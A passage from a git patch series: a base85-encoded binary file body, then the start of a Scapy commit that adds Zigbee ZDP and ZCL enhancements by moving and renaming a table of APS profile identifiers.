z(sXp-5U4~FvY~?b#33|m4@i3cOQ3`oGbT3q<0=SH=Ejke;T;L8-)4M@@HqMX7S^>^ zr6^GKb|bu$5wHr3^_w(HuyEHhu?zywu#T0U?MiV-!XBFuxte zEEyKLbpIjcd+6Oh+0JJ@<3s0=j3RA`wMnF(v1NZ7WIiVkbVO{G#dU&=JvtSTfjn6w z!>r}C*mH&^hS~hWH7o~VKVDbu$=0DX@+_~4c>hiHy3>Dh;o5nq+g61J8Hj90If*(>%cvOutaW z`m))BJeQQ&^K8x5pu}A%8E?oY+K@sGPq3`UmQfXW+-YLiefE$!XH}CHao3lXKIfs% z2Gv=Pmx`qd@VLB5kG3iRW``EslQ`SR{`raE1w2kvwnN~G{!L$&bFT)7LT&aK${N+J zMsSVX!DWL&ua|qIuK@tNPYLf=h#pO2=C?A$!{oaywP;j+Z#q9Vxvy6dW zc|J-lu?2=|E5S3~;>}VlbM?e=64ua%VS6w9!QgS9fW(P7;L;Bc?}l9j`N6U<0`QJ~ zu7($b+DwJ1>;SYm+Oi24vVAJk%~uiZ7zg+eoCcT>$g%#t3T?`5O&^^^Y8_%0V{5za z4^a&@W;dy23`?Y;MjkY{6yx=E*jKO@szFo;fX}qemoch&O4LoxoJ(f8pDz zWmH)z9!Q^*s3rW85>pANbx1?r_N|=;yWjM{_#D`EC*W#}zoD82rKi&d0T`HHnzI|I znrf8&-CKk|Pk{^8A4P*j)zH=pd|w^>1WKVSUY}e}0icslZw+S}6u1>g-e`Tr zKu^3Jh+=?Rulbd;%U+G~-2^WP7rxT?H`|#4rzmB!W^_jlnLo0i+`k{#ctLM6{MZv1 zEua>a1ROt5*HNg!7fVe7u)C)FP(5)3S!?5?T}tv{r8mX0KrojP98?$CH*>2c!lHUr zGAN@bqx9HL%F74+*u}}aO)jrbTis5L*c$%Bo#Tpqx zy57z5{>5@`Ze5V(IkLiQld7=wW$D%#6xRNeZ!BbIhTNm19e?&N?e*YZ;J7 z3%sUhJeJN5cuMs6c{@)jXFg?^bSG#R;b@Y25tCQsE6(d=r7UyvP6i zte|_#%FJUG6D^q=Prk-xPsg~m1?ozMM;SY=j`iQu*_;)uvKZ1&o3{AGI_x>_h85qk zt+c4vy0$bM*^+&BO`X5+ayo3?LB&wNsH@S)j5;>{u6e&~rA-Xww(Kp#HzE0ipWA`u ziEDe+2-+y(&;t<%k3vtX7rn&tSXH{ex3$)^h3mD`Nw(O;Npb$l3L-JHC!bZdXvjRy z4(7U~EmeGmxgff-Jujl9tZAqhHk**QE}Wpuh`T)*~MO@ycp7TP+E%N+l6axG>#$2Z)Hv_Y%J+?DbA+- zp%}uvl;9T>EJ$1OoktuO2cHlet8d$v-@%WVs%x}_Og(Vv*V5;1uCeGWKk|C;t-}cfpLM~k9tL}>bj$fcGPc<$j6KDR|+Qunc+%dDY{UMe{z8s1|_EU>A zBA-ecU`$g~3l|E`ltr`_>j9%NU2?}Ac$@e_`8bQb?XQX%pm>{|S}R>;-6h@Edy(Z@yS(O#$D>?A z4%1?mYRfM72)CawLt*$(AHH-}*RQVhi*#HKoQsq`TdYW=e$GuGD|~}-FLF#H4kMIe z!j{f|);A1a=od0>`Kq_Q+I2ZL{3t6BW@UbB@Zg_aXH~6qkUej5Xc4CcU2Lf|Vbuy4 zri=D&ezx&V%0ld`2=Uq*R@HNNR6j-4N z_Oy`d_?@363#=jPTp*S}O01_*y6J+kIWp?CN7$PzD#q}7tO zvKI)(HJ!$nH;2fmWHYs5=Oo+9!m49u`Xo9@S3V~;9VQye_GQePaO5Qvcb?PvC@6d} zSt}WT#~_qTKjqvg)gMhoeHQJ~%G&s?fd1 zZrvn|)WqlIEBC?{M#_(E=#*{!IBaZCoKx2g{V*9V&a~IOQdXNKs)Zfvk6j=h3pqZ$ z%df51`fnc0Ah@HC6Ht+9^X5?YK;$s_=Y>#GshY-dIfaGIwt*5Gtr{1cxu9A>Qc!GW zSOYn#y^i`otsySE`hTMX1iOh=2f+p7{@^-cGJWA!9tvBXZ^_mbVEITc?PW+MpC}KO_ zT?!L%*P6a@H!K8PqPDMw{(+Y|oXDo-HNcXVUBUm`D+8dezl)OR+k!`2Qju(VuzVG~ zO9A&p*R&HDQBbI$8#0R21Xlnc-|~%ezu5Hv0Cy&IpDQ$hen0Pd3&8WwrYOeCJtXFi zFn)vpqa0vnKCd7;X`p+>R!a)Wwwe(Uh zC2=jG>A1K;Sv_8Hn*6P<^8Z9Vr2Y=CC_2s123(1XYXtzw0?(;M0SREI2WNrjB$D&t z8#QSJY3`&D>l!Db8kTYk&;4&OVlJ~0Yc5k1l6)Vc^mox%zigm?`RL~$B=d_N5b2-D7v(;BeW1(NFiz6@@5L1RPC zJJb|I?|9xEl^EHy)VX{Z150rZf-L&zJz>? zYTTXxmzVnKe_9iNgO#=^RSdOb{?x`qEambq%E3lW`lj;WVgD$uyj@xoKR}2b?g&AC zYZ$Rp$T{^PcfE|V_Kuu8OqGL8m<&!`EB^qrah4R*04sah+WRs%A9hyBh6CO6Ew7g^Kh;=?XbPL?mbEZKiKw&U|( zW~~74%kMV8YZjvJYw2wZ1ehb~M%y5wkWmkn&rH|6QkVC^^Z`$l`4A#1VXS>w<-V<@Y#xJWYaEre^nj=wF@V?|0qoJ#pT_VD)DE_58>8plGkiNsKyRccX<;UF)8`@Xe% ziw?>!6~ao(6G2_k_Jh_}tDG`M0%PRC#d{DHZv}g;pu3H#4T!cNLUP_HqVd(;bWpS7 z3U<)k(_>&X2q1ORhp91tcoi>!a$ivS$$^BG!`TNtYf{X%eqRCUu;4r#_OFuo(|Ybd zj`To0N#0l|5YU`rorU|?HW>n9FL>Q?d15|HxIN$mrSuSaM*v3U^W!j3T0F1E5AmyS zbcyLqvCsXc^B6LvKbLi*LXiiH;h^>aIU%FIBhRt{W)YSj#%Teq?{N-j0&)ni{T&ic zz~7G_E>Peq@8-I|eJLbca;CJHkwUDv-70FfNhrI15JW@Z0b;}Fz<%B1EE&8I4oZRZ zsfFY@G4NETTFni`#%~g0mv?|_a2ToVemAk2VVgtx4kF`lISU7{$*>vZBv3EY*(8=< z*uai2dKy;vkI1F9b^NB*RoO`yZ6`FS_g&g9W!Uaru#SqStX-{)r%$a%QM3ax;vDK9 zi<$9#cCPJzn~c^N;C3;|XH;^C<;*VLLOn> zwJf>3QnOpE_4mA9X~463T}0`C1n&vqu9eBn(TW(I>ieqpHKJ~M&0%S6LC^g|m-1d0 z921-y4tn9`gl^gV(Ipg`ctm96ii8~1zH?nADHdUDeNQ5Z)ElQ;OQ3U~6-bxnQyEtQLV<5Kb*&n5{)oDB%MpZ5LUe9xODN5KKxjVagD z<0;!oh@Rg1fC$4bGuJts!w)hx{6$a8i`cc1)|D-30YBc*QY+(7l14b8%yi#MBTtCD zm8k(7#v9^uu*9$8{pHLj%09nn`&$~aRK?74P8A;!8sv6$FL#I<=eIwWm}=tMQ`Vl% zJ=fgck8Qr>A$V;qH1{4X<76u=flk*lN>5&;`^i`1W_ajit@eP<`Y<@c#LDW~86rxM z3xE8+-u;}kLbMl3|zlymsJ<2cg{WamKQ1 z_V@4KU?l5oCs*-5t2`O6Yx57gz$>j27dY#e$@NEk-sUC0uvq%`#_$b5AR)Y}z2){} zZ^squJ7voMjK)*ONt*zo^gt{!`yT)^lllWS8ImbN@Y| z-8Knb)3K+$%(Z;&rT7MWN#Io7Q`aZgN=eQ9q@GL!eMh$U$xn~)sP>iFUOl1GYO`L0=3l5dbJD;Cfyaxj z7kt+p-k`Kr4AcicAcvi@;4xH?lhLMs<`3U_yi{fDO45AsPnM_--2> zK>vzU%>KS41#{NdAvt|BwT8{-$&2p~D}3eGlpxpnq>djru`P}Y3(_FnmmKjRQr$wy zRQc^YzEqX)?nB)ts$MOxJc*f=jHt{@^mp_s)a~mP>o*?r8Y&9hn~&fZX;H_^+l#GD zN&a>8@f49MXP1nwY~I)|eiPuk!~OFS-77gZ#G#sJqo*Gs(lsu%pKoND&v9*Omn z!pd9?N}HRSmYqMcb-JKtx7u}b6~cJU(yX=TCBh_;c0ZoPtNPJHH`#11{6~1R^K|E{ zF``vkP=2uRA-&nIXRqna(q%qAmUzwavKwXJ#0*xnb2AG0%uiWg(--PVbiIMvzHx}!4XWk)Uf){}Du zQdUp69%@Oj?BHwK&`1NTs^_ole!!|sk z-FIc<+M@ZR}cgVN>udCa{}w*i)EwF|jQ~WKj3H zC)zHIqMV%RP(W;A;DvI^Xu6?)9jQ)p+6eJr`I);sI98a}p+926s`QZeq)828?#f{t zLzsAu>IA^F6Gt0EGV3IT1S2VqA7KF9r$ z?;*&U^p+L45@)Ejb5rU<{_Yiin#ujXMgCbmr){r94{wAvSeosuV$62> zs=j`4zaiyE!^ZLLduB2HWgi`p!Dcc3S`M*`x=u0`P0tD=@l4INE<2y0ii0u(ZT2e$ z#F1&7sEUB(3FV95O(mzU6w#G*Wm-xS{oai6QY*i-F^9|)`<01@=1Zt4`Trq0HYRQu zZ*?5IuiExrj}q2VosW*%U->3F?o;VLSo*BE>soY<&SLW3%rfd9kkoS$y)G73w=N$R zcP+0;`o~DS=r;?UvMwA-wavvamvO>^8ok$G5@ZBVzxS654IXQJFL_-lQPJU-*{$Hx z<3t|?{kB<=G3B1xPeJ_O*8bBv&Uy;B##N0`PUoxaJpaWFQbF@?C2 zSk#X^^7NpErF+UHdTid?c-(RdwdBgGh&^mHwn8OwCf-L+6FrHGRzC4J9o}gkpL~fP z1ADMu)bvZ*vX5{@`D^(x1Zl~2-hDnK?8W`JOY#1^ND=LXa|+MC4f1e#mUh^a%NIR# zZ)gl!vpHYIl26U$#T0lxY<8&#ZdRDmu#GIaVyE5~sHU&o5vMV^ZZSzeeQMO_6;glp zp71r=7FEW;%5fJ*UfjdPKc~t-op974aaL0qLEKaDqb5a9mbXse;`1}LUZkB1M5`iQ z6^nr}pB%T>njsJFoA}PCbDc2HlE?FS9ULRb)QT2d{NnDfEoyi%Z}bSodr%{1?LsBt zO;zHFID)&~ce>u%Gv|H8LZ8rg)5oGde;Crt%}(LXI$$6@dknVJsgfzF<9fI5@s{z% zQxTmCQLk_iZA#}8>QU6xjKtoGo35R#a7cRZJw0?@XwS6i+gSBKc`&fQIU8%e+!}yA zDLw9{hZem%lF#97{va&1ArHO)P&IN^pSS9+{~ui9^Xv7SVY|RT3n6E(RTJ&q4^Fkn zfB1vTE!ee~p|wslwN@!`NRn;fQM_h2rRjALllzOGzzQ7^69}Y%@gRp@5+(uWE0-(E zWsIBrc^{fVVYhl~e}BxRfm-ZE`;xmzcmMf8R_H-+C4mixa9lME5tWxPA2|NT3TtNo z^7lT*p}5>Fsx-3c4~R=s%XwYrL7Ko~RBC|E0HhAmZnkYtJkfZpHr!EtaZ&?a)UJOG zeEERsHsx{xV>vo-_{Y6Q*w1R`P(?u5*m(P0IUh_Kc!W9FAHtc^DAKh9FQYtlZ`Tc1 z7ffk{e73c8LI={I&rS?fyKhW`?_pq$XF_twS%-Ue~-|NKK&#OiDd$3JIJGdGB31SY?@hlQjk8{A~;gx-rY ze75xx$iqkN&yW+^^4C-|x&^eBANZ3A?sus_v%|39iwD+A*Rw&A#Sxy(JV>^e4{R6VN{YpWug}a6TuKLrToI}t2BT`Qa1-{b3`Qg9S84hXcYlo5_ChdV{x00e6 z(tZy`a^BDvGk5IHRGSOnfsS|z;tB~TMRLUL05+mzOYGzn%OOsoZ~>zd?BAw9=K{H> z%$$}GhoC8xmd(<|oJQ<5aUfQrQrWby5aCoGQtTyzq1V3pz+=hZgnSQ@xH+b9C`#1zl0=^ib z_Pr4{LEeTz94)Y}G{74B6T!oW@1|Ke7XXaUDqi9J0mx~FD>_khsHzd%6} z@TQVvK!U_hGLm?US7hGvMgw(T{|!DtGT|h-P&xrAsMM5#Kt{@p-JRR)f(+r`!&}td z|JTxW$5Z|N|4(L8At8~STQZVyZP{c+N_NREZdNWC*_)7gjk33_go~`MeX}z!_i}C5 zb!{%c_wD=p%j4Yl`>faNbw4&Ha$N{?!M%W&)<(?Ve4GNks8CEQg43)f@jN)6u^mwhCOUR z?2sboSs z+gXjc%TLp)ur$Bh4XZ$U-{ZeoX0456_5#>`AgLY?)C#yya|FL0vicVl6_@7%SO6`O zTn^F@`IWuiRTz)VjR2T9p!j35X!5NfOD9}}w!~n583G228@C zy7|+J(&HWm77|5soUZwJh=v4#Q_M(gCqepF7pR_-9a?=`@nrg&g9HQEyn%Sl3%jN( z9{RAh|A}LWkx0L7fvYH@2;j**ND8gF@is8yg}WiHjDUK=#q0KCJWGTgR&D~=syr|# z+U-KkSMqOxSY(+KWy5cuH%FR%m?8;R47ytE$S)@YILQfK?ig@2TZi@rif`o{Fkp0w zvO~{N$>Z6xTO=xZ{F3YmCCc9N4#3#(CB;*;9?L{<3l;r50RYJ6qgOgkH2~NtrgCG0 zX>?iHt7?)WSAUe)PTDLlRHTspz|?BfRu*$mVspZqSBO63-2TZVQhFk8g=Xl@|I;J@ ztgFx86+GKz5fXTo5edEp$Udx&ZpH(KRYTG?Q?{Lxkq8tA`%z1$-efHSyo=^JfK^vL zSiy@F6bM;2V8SVMF*24^9nA^>E$X|(Gcx09uS*@QNMOO_9&-kn9XFE=7xiWU8wJbU z5_xglB+!8ett(Iz+V-UfbUY^QXYGJQy5VD*HZK613*0az@V#7xQmE$GT>u-UuumT~ z-5m(ou)WyiO4Ve3hE}zj5N87y+t`qSM(sn#-sCU%`_zkc+>Wcyv z28)F-rt*{xKn4EOs42_;Zv#r2VEF}Uf&jZ{<&*_@h&}No!V;1DSyRWE44Njp&k1cY zT~fU7pBPuuwh~m%=gs}Pqo!D!SOejKHg`CV@AJMF9dX(y{@^tF#ecWZ#9Vk`iNTh_ zCBtwt?ni`S4PHD7Gp_U5H3)Bd-!Zd$qg=m4Y9BJhSoF5<=#Jv#2Lruw@;7neP3hhF znMi?zV!mEm)^Qsm|KN_km(y$us@0*@>Np%EY`)CqV+3n*^luLZerwXR-G8P=|9gW~ zCSv_;t@~t|{DPESK7>=*~@rn&NH1=z4kVHa(9M49bTj zMX?+WT(;0|i}J_K9yCT57p%&S_Rzi`g>U%okeOfIppVfiVW;8wL3@f_?PFL+7i7^r z7%5JznjZDSTFbd;Bt?zqdr3d+3%RdntQRnQW7KmGq!`z|BY_mFFs<{jy8uq!lisb_ zj>&&8WYlaDE-VJ7(jQ@h8Q;xpse+D9_KH^n4Ts(CpAXsj`JfW6Gw*k?fGbPdUa0})-%NW4T`cV)KA6u8 z2n-Rd;5yO;FZ@6e`NgSl+_~^ep0q-eFH*(cG6!+zU&U=p-9|`xb|mFev50UF#j(=CU{6xPTQu0ttzpIys@5&92LM4^0{4wQwNvwcCZ?NT2&i zG|2$@aDHiq;e*&s>%PN9-kcIO(AqXz6+tridagm}PA-Dd|F%ySxWFE|jXJ>&Qonuz zf`QhD9$I=n)m`8!%`r2pN7?H&CoPq^`0s>HQxu4S7POKyUTx#gUo*BisL@~|k=sA- z6+E2hIa10b&i7)XmiQ!r)9bCKUGX@O!~*=1|Hz;2t0PwP%H50^U>(JAcNdo!@46~j zE&km%+~%PDopiL4Y^(be&z%Iu`RBOIyp@(nnf?UGP9a-Wu-jK&PV0^})33aVA3@{Q zUgnJuK@P=R(dO=8*6+i2)&Im zqiEKdR`&txJNI|%8=tPSG)GEC%?&ozIt?=t^0sAoLf$d!v1>C6p&oFzomTQj-%?v~ z50l~X(0Y1tMW!arz%xw0nAg^iJNT;Dp9CJ1%`|kCtA=&{LUzb^{^xR5%uhe;QKL{$ z!y+i_`qE`HxWY^)+_bA=1QQP3Z7J;X$8wSpqR>!u0_@3Z(gpYLk~pK|D>?Y)RMMTn zheCIqm4wA+e&Et$=l5ZkmG!96FYv%{LN^UGpV!mBcSWtFE;@3f>o zs;klxCIC)XLg1F`f5BP5ICyszkp9MLzn+3UasFK&BI(-Yb|Y+>zE2?g*Ej-wX1m$; zQm#253h0S77URC2rXJa!b6h9ia38(Cvo1Pn(rTgHsxzV5_=+RU2fn(VISm>FG>M7{ z1BKqw>gtQp)=@?h-S*zFH8A4DUVa-L{HJn<-Ir1BON^C2J)}<{sDn7de@`jf8n`KN z%6ntEAwU0e==pQ1^1BOW#He5HYzqn6B1uc+!ZR z3+G*Z$pMt2seOuLVO$x|2_|3{Bi}T*rex!E*22E6tF3Sedb1suT;qu8U0QnQ(v%E2 zT+)YMrP%I`#wFCRSw39ZIq;tiVL|pz&DQyr{}-QIO7rBq2CZC;f_R%YweIgnCEI zyl?hn6hWI)4M1tl5KBqGP=<(;cR=-qu!V1xErk5zh5UVj){&qHy_C#vEnE1%2kQos(4CxaO_< zXY|V_t|wB8a`EMA+FE2s0fkp7rfy3kdEbu8`3~n5|HrLGaZ6+*HDwD|@mT5v?QP@S z^d8>ByP?vU_&6WUoAF9~RZbHvAKv~*!&-_Ghc6$~KU|r3;#zr#% zRx?K+sq<5bdf53OFyzk_jRZNsCj|0|fJU;wjXCs38)wr4<@f5SPh9pWK{ zl$Jsl`3T;YNze(1oGPK8}#B2;#dH$4DU*FAgRPiELDJz?i9(y zPkDLe+#6_gXtImF=nBPDhT1>pDei360BrmBav%TKVYYAqxzgy*ucV^O2$?p5?eQOR zoHps*Gv)9Mq%u%E{Z|a$zfuVyQyMMzl8-OfC0JfT`ddBzTtTx(GF>1k?6HdP2P%@Qmr ziVA77MecGrTxUm;Ol0P?p!Ap(FlG*^B#SF*uPyqoz3s3I7$5xor&;MzV0;|wq=#xx z7Y`-5dM12*fT?8D$g>xdDr+N2n((QJh>ZMECPlx!(bfNWAwUlR-!J--#a7qK z$lH;fUD11``I(D;d$%7Cj2Ylak+O32PW``OV;22?llo7{e+V2`M3YLQNm1Bhy0{Jn z$YGCgy#KQy*F4*09DtvHo?pj-2J{lDNR0ogz8=bhwkm+>XCoIyG9V*j^knyhyh{fw z*8w!TSJ!qZLf^o#45<0}JQrca#ZuskW5adxsU@_Szs02jw)Lgk0lE{?iaYU!i_wox z+#uOkm=Xz|r;JD+IRED*CPjujfXKih5-JBYQy?$?&t(Vy7Jfk}7xa-Qm!0GWH))^% z%!P>Oc)UXtLjt+$K7xvUz&t57L|S9*jq(FLu~8iV=vKeQ1Wc>yAF%9{`vKJZ`;OU= zI?K2BRYXQed->-qM-CFCI; z{aMcduun+z{tm&d;MyKX?BD!N*stn4bvT>ZlE?b)w!VO?U3Vfou1aiB?VP^}@M;N6 zr0d@8m&8Ihh0w)7Iz2Ljp_SZc>nHt`Hn*JTXw8jCm^cIq=!kq*_8yQ zi)CIhx{~0eSVpVW*b6J_^5h4k;?O2~0wRs+9G-GrN!O(l4Fi}VPq54r@nuk*F{cN+ z7^r9d*=MhoTiIWmI?d8lnjA7P;qZ-aS3W;18}{=R`QH&6Ma)WagdsOg?L;pQ{rNm; zi&C4b%TA7&qxIVS#xxt>S%#0A_~SSOsDw@DYv|lf)4qgR3Wd7+4D%L+n?`jl7cZBS)sJtyss2NJ&6qB-y{X%>n!Y|-&Rn>c zd-^V<)^xQ`O!9#LzaH45Me=ow`M|dSl?;GMn z90)rn_q3Q_etX%-5}0+4hWa*qB+C(m@1bc|{O>MOz=|PRn&v(SCbdo@@e)7wUj^q`a@Ou<{2HjlMcZjzOUph25H$@SeFk zu)?#2`k(0u;ZvN=Vh^e|CE|{EV0SrVIZ*~%vJk@Zm8u86RYKNdHWMjI@MX7gOw$jw z&$Gd`&_}mr4z51OcM%2hFqSt(EE2C#Ke?)}nr8AfL(;HN_t`i|^F?|{UYQ5+4v%4> zT9MMtR!^1$ZSckqDNFT$ZkX{h|C2SDc+s6w8=vKZ6CGW_qIB=|>O$MU@$SdsbSJNq}8 zhhDy+^&w@~xcL=l{Oe?TY#WQa^`M+Vp!VSmMHY^0C55a=NA8-X^vv$0N>w>*w$Y1Q z9CbcpAwc}yk;##AHqHJJrSghQi!JF|YM#6E+@tcKO54@to0!T>9msmT6n@n2FBh zJszjP`7Kwu))}=&(VW>459?DrJcI%6KDWOVY{p#ZT_2y}n;-Mz zgB(y+A9FCfL%9(`^GMf~qdqs~6Y~M{>B?6?YXqC=%A+=8Hpsxq?eiRata^vu+EO@v`TID+0^Vo7H ztMmLUP4R0!ACT+Nt{*LQIB z`@)-SRrePYZj~(=nAOq=>cVyK&pE^y#o5C$ul?9S%spe>>t^fNt!uWps*RsIj8)c2 zC6h1UMqAsl+6#c{t{!sg?Mfmxmh+O}Y7LgAM;!BAf&>R=3r+JC5Olx^*Vr8+ty2(h zHr420`D?27E7brye*<@%ly@=gE&DIc{(;d5>rA78`4437?5YT-Rl4(# z1Lf=={u`wnO8*Qa#yO(fpMqVap-sAxNuf6Vb8RYM7h}QR29Edf5Eb(4epYs1mLo>( z-7h$gMKP`7*#+IG?%}$3{8KEneNsAWSF^t!+`_(^8qaUKEtDCoOz8Wju*m~f8QtqS z$dRtwhyiPa=KOw21G9j7s8L{CeZC1L%iNQuZNw1zna4u(X9}h6)h$s{ddg zZat5%Yg!QR(c*ugSMKaTm{4_7k(2w#bw>E^c8p2gt#=9oO0QpPv}43Gf{8cc2`78k z-id9kYsljI-a1R`=O4A)rNAvAhbE3F?-{3IRp3o}?8w$aV`;5~L^#yB=5lLat@Nm^ z_>Ly+K|YQx;0uDU5{Jhs0sT&bHC%`v3(?Ll^E2>^2N zx3B}GCbbRMreWSzEQ594tDqJKtxV`nlI6ha-7Jm#m=>z>41ckfw5WP1^nk8$@u~#T zZm3E$K&uZ%2%R6T8E(DN)-no$$2#86{JRR zs+6w)F^{sh@p%dFxYAh*-1xbQ7q|*S$32>+KmT*tZ$% zlAKT`Zz`B__sX&yx7bHU{S-W!P9OTMiqL&ap%DUUB3nR;=A6?Ak+DbLOpL7q=GFET zHveA7#M1h%%(+-|zECLbjM!_66cw_Zv(5IzIizMzrlNhtLZ;>nlebsoha6t2R@$-; zZtEUGsO<^+?hLyI_+r{WxsH52OD)T$Le>+xUSbJmXN5Go{GOG`50^`~Y8qcCb&WvV z-tqvbF<~}%-M;TjoytF1V8h~+rZLVu@^Bv)oi9{OW5Y4dT0TAfURbI5?Z<9o716hG z#%JZ*z@W3xkJoB8$s`J8wF*`Fy==B!@xB+LI;~Q4ASTY!#$|N-b^AK7B9?ze1U^sh*D5X8kkQ&zsaScR!Mc!wn2D?GbI$r8 zF2(Zml#d`Aa12lZ@6O~$8)EOIz36~}-OAqDy$PKh-1@1tk}r2}$c#Z*QfSBA4-KH4K}1 z|5griOnG%<4HmEyo@Te7Y6&(*=|OyBl2Aqwr6#Ts#u%gjacTeQ)ZUxjeAIzOM#$!uPStf6J2n=)};@5-ky z-BJUCEaz(?#e{rRirduOQoR+gu=+Nz4r7PZt`j}XQqM4Y#%B#4(%Pnf(Zjz#s{Gx+ps1>KG)K#O{$WxhQGrva(&nah1*6hOh`Y5WF34IYXb#&&??vU` zjzHR$pLm!@&azw1yrNwF>%6@^b;5mPBAv&zjPa!F=U^naK%(L7C5_AT7j)&2*1?Q+ zfk!^w1KBf~pPNLgM`M#CB9&^Q#=5rTALXm(>KWC}__De`mzOJlgy?$+M#;K}MX9Pe zb+CHEMEJZ{^y~SQdt{g%q(gv@d27~|ePJSXNHnK9J)>i?^jowfTXFAw*7jS?jh}aA zpXlKY&HDva^;+`87MvwN@AWsmXL2Rna8`9gi@Ne%7 zW7LSjA7}?)pyf%$pDDBEkG+Kin}^8W_Q0y_VI$N9`3#E0`&nEz8bxnr?K*E((R#mj zL`zQC&z&>ln=)xE|Ee4=H}l%VVVTd;`$hlDF(pZ~M_vTssT^F3w)_XFy+~wf_T-@AvOz0Xr%e zN5J0NqJ*pED>b+JCwDtsV!%ax{`diG{dIV^%X||2>`QA2UDjF1Lg@7g>A5rh)A4SG z?@C@1uwa`u=zQN~>(kdKeZ;#S<86)V2hl4+5b7P7li1G+d0UHeMiBy_eR|Bt*1ax5 z3KP}rvWrWc{9Wmd&f36JREKJky3@iZX-Ek4vd(~PllP+ozHD$PTJRFLkK-!Ly_b4{sDiVaN`=4Fa@@w-Y}z%B)nkJ{0{9o*SgCVo4{iy^iIfh;(E)vY)e4S)8)E zD`vt7>{YBU1RGsrf6&(!TyKttMO&nr!Y73PoWn%!Xp=LR_uDf8iz4Bh2;hwtT*$A1GLg_|`$B^$28pKJ!B4zNsb6D-<)*;ou-rZIj2Qs#2^v2=ZN-Aj^(uC&u!t zVmD+@sG8RdzFDjJ1zYIcU+886{)$(*a|Iaq1vA;P^2;qziWDZ>G@%<&XVBE%L+_{X zXD>s1`DAwE7peK>ao_vLtFn8+v{9J?Lsib42gyJTFLQ zox}>!8Q_q!cFHOdS*E;?L7?stNScR(KpzF9dBtVpSsGnSqPagcu;zA z?L+mm3BHFsbCB=w%`XaVEOrdQ*XIwO1G#m>$S&=U0LX}aG9z{F{r*p!&t0M>M|)i3 zhIx)!pjg`4H954*soG9(=z5jra(>_46`JOg<~|y31pdPuM|V;@n5eWIQo{1nCR_lt zC#V}xLZ194Oklj|`fT(XOJ--70BGgWS&-k~Ia*OZ(6&R0p0wGr?F*<&>t)wpvatPU zrM1(T{fd(c{|Uw{+|Bsa40IEa{R=Q2a$Ee}t-pnyy4?z-Mh45`oOVL_O&a8l7=^=J z%GxxNXFOnv`!B87%Qgl;0u5^keSv*64`Pjk%ctC*$KeX4LT+G(jCIeR*4CtFI#bU+ zn7cpUveU7PlEoQZL%7M`?ls{Ky1lFSqV%`V=HH(Y!U$cE(@zIW+#AGGGUYf;{jsMG zCAJ+&fmbO!cRXmv0CAlBY`Gyx6_vxTNZ{ETDqp{_?zV8DM9-)2#v1)MO|CMB_Esqh zp9_9BpXv_C#ZMTWDJ<3h2XR)GnC;3WIt+q$O-1(39#)2Y?S%hI(0XLSAy6jS?&N;( zFOOHwWpkn>F-rt zqf5GfYMU27pR_+}Z7I$6G|Q~0JRmNMPHYM2Io$1*){MR-_aH9wkK`b-Fbt`FIotNB zBmLS3ro)nr(#16b|ItaJx1NDqbsThLt9wUAvXhaP=gHhn$ghE0_cGS%HzaNiIK57} z$q7^eH-t3aT5qJ`{#d~~=eYYk%b0F4eUQJ{%3fx|hVl!iz(dLQ=Gwe7>~Pnhu7D&O zs=QMx3vXQ>3q$D{$#LHsuRVN{S7j@Iv@lxBTAd|3;#|1=%Kz*sca1cFkqqt0P1-D> z^Y~b8Ee6e>Neq`<8VYG@c{I+CEm`^)b9~pfInKpfpyAQaT`y$b%VqWCXPe;zOKRWg zQ}bF*0DPs=gJi~_oh2coM(*^bYwl2-07!LtLw33h;=|V>a4DHlU2rP?U|qSWEVY00 zJlgJvqo^n=^I;;rXPq%;o_6ZggCTQE3RDB2eLF9rdH&ylkO4j|t-c_yMbT<{{SjM^ z!nMSDWQEuQ9iC6bQSNA2h$p#IMrxizOBWKS@4>bRQcl;6oSwWr z|8V9z(eCZ1CAOX8hl8$kZhXc+g?x`l=oy1HmwsQ1@{5DCc`|h2p#J@rh!!$q`;whL#4!U5Zc5Q;TTW8>U$T zh(I@GBn3O{JXNFq7Sy_RX0|u;Tp5N|coarNV}}hnZW^Rnet)58*dD8bhLk1^g^KP zgnm%ITWr8q1d~~Wpq~yBt)=0*Hhu$<#IXp!CTAw5Jvg&;mk^9fd1(E@Cq<}k&D%mT z^RcjSWZQlMkFbxVj8vd`xl~ooee_F6ex%j3OR4y6WXoF_SzG;1Dy=ycZAtgb5;{&f zzwf!)cJOqq(;c#$$5@J&snP+TmgHmcI-Madg4GgZ54n8=h^r6!3fabxfnhYf>R|iR z_4`Er2g9SKdTB~qC8!ze7c;56*I@9Kgh#Ot!RnV=A(GD|A{sI=_{I__I+OR=s-R`+ zbmoI0J}cGM)p8`0F6*$6V!3tb=b&$SeiCnkrT$pmHNPtybhn(d!a8)@7=bHUrxD>_ zHjHcahh(I_Rm>C-){~j#%n}jKn4|+eC>wNJ%JbWYCyu3pF literal 0 HcmV?d00001 From 6ad83c513648fc1b4199a4b2d7b74b8a8c2ae0ce Mon Sep 17 00:00:00 2001 From: Dimitrios-Georgios Akestoridis Date: Mon, 23 Aug 2021 11:24:21 -0400 Subject: [PATCH 0633/1632] Add ZDP and ZCL enhancements --- scapy/layers/zigbee.py | 374 ++++++++++++++++++++++++++++++---- test/scapy/layers/dot15d4.uts | 50 ++++- 2 files changed, 388 insertions(+), 36 deletions(-) diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 4f44e0f0d76..501da5f96bd 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -4,7 +4,7 @@ # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames # Copyright (C) Gabriel Potter : 2018 -# Copyright (C) 2020 Dimitrios-Georgios Akestoridis +# Copyright (C) 2020-2021 Dimitrios-Georgios Akestoridis # This program is published under a GPLv2 license """ @@ -25,6 +25,18 @@ from scapy.layers.inet import UDP from scapy.layers.ntp import TimeStampField + +# APS Profile Identifiers +_aps_profile_identifiers = { + 0x0000: "Zigbee_Device_Profile", + 0x0101: "IPM_Industrial_Plant_Monitoring", + 0x0104: "HA_Home_Automation", + 0x0105: "CBA_Commercial_Building_Automation", + 0x0107: "TA_Telecom_Applications", + 0x0108: "HC_Health_Care", + 0x0109: "SE_Smart_Energy_Profile", +} + # ZigBee Cluster Library Identifiers, Table 2.2 ZCL _zcl_cluster_identifier = { # Functional Domain: General @@ -109,22 +121,11 @@ 0x0800: "key_establishment", } -# ZigBee stack profiles -_zcl_profile_identifier = { - 0x0000: "ZigBee_Stack_Profile_1", - 0x0101: "IPM_Industrial_Plant_Monitoring", - 0x0104: "HA_Home_Automation", - 0x0105: "CBA_Commercial_Building_Automation", - 0x0107: "TA_Telecom_Applications", - 0x0108: "HC_Health_Care", - 0x0109: "SE_Smart_Energy_Profile", -} - # ZigBee Cluster Library, 